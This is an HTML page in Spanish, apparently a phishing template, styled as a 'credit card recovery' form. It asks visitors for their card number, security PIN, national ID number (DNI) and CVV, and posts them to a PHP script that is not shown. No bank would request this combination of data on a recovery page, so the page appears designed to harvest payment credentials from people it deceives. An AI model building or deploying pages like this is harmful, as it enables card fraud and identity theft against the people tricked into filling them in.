<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Targeta de credito</title>

    <style>
        body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
    background-image: url(https://e.rpp-noticias.io/xlarge/2021/08/26/580058_1136602.jpg); /* Ruta de la imagen de fondo */
    background-size: cover; /* Para cubrir todo el fondo */
    background-position: center; /* Para centrar la imagen */
    background-attachment: fixed; /* Para mantener la imagen en su lugar mientras se desplaza */
}

.container {
    max-width: 800px;
    margin: 100px auto;
    background-color: rgba(255, 255, 255, 0.7); /* Color de fondo semi-transparente para que el texto sea legible */
    padding: 20px;
    text-align: center;
}
        body {
          font-family: Arial, sans-serif;
          margin: 0;
          padding: 0;
          background-color: #f2f2f2;
        }
        .container {
          max-width: 600px;
          margin: 50px auto;
          background-color: #fff;
          padding: 20px;
          border-radius: 10px;
          box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h2 {
          text-align: center;
        }
        form {
          margin-top: 20px;
        }
        input[type="text"],
        input[type="password"],
        input[type="number"] {
          width: 100%;
          padding: 10px;
          margin: 10px 0;
          border: 1px solid #ccc;
          border-radius: 5px;
          box-sizing: border-box;
        }
        input[type="submit"] {
          width: 100%;
          padding: 10px;
          margin-top: 20px;
          border: none;
          background-color: #007bff;
          color: #fff;
          cursor: pointer;
          border-radius: 5px;
          box-sizing: border-box;
        }
        input[type="submit"]:hover {
          background-color: #0056b3;
        }
      </style>

</head>
<body>
    <div class="container">
        <h2>RECUPERACIÓN DE TARGETA DE CREDITO</h2>
        <form action="procesar_tarjeta.php" method="post">
          <input type="text" name="numero_tarjeta" placeholder="Número de Tarjeta de Crédito" required>
          <input type="password" name="clave_seguridad" placeholder="Clave de Seguridad" required>
          <input type="number" name="dni" placeholder="Número de Documento de Identidad (DNI)" required>
          <input type="text" name="cvv" placeholder="CVV" required>
          <input type="submit" value="Enviar Información">
        </form>
      </div>
</body>
</html>

